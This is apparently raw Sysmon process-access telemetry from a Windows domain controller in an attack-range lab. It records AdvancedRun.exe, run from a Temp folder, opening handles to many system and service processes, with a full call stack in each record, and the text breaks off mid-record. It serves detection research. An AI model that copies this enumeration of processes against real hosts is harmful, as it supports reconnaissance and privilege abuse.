22:21:53.714{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-3000-000000002402}2304C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.713{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2E00-000000002402}3044C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.713{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2D00-000000002402}3032C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2C00-000000002402}2984C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2B00-000000002402}2976C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2A00-000000002402}2960C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2900-000000002402}2948C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2800-000000002402}2836C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2600-000000002402}2820C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2500-000000002402}2748C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB9-61E7-2300-000000002402}2592C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB5-61E7-2200-000000002402}2520C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB5-61E7-2100-000000002402}2512C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB1-61E7-1F00-000000002402}2104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.711{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1700-000000002402}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1600-000000002402}1292C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1500-000000002402}1240C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+6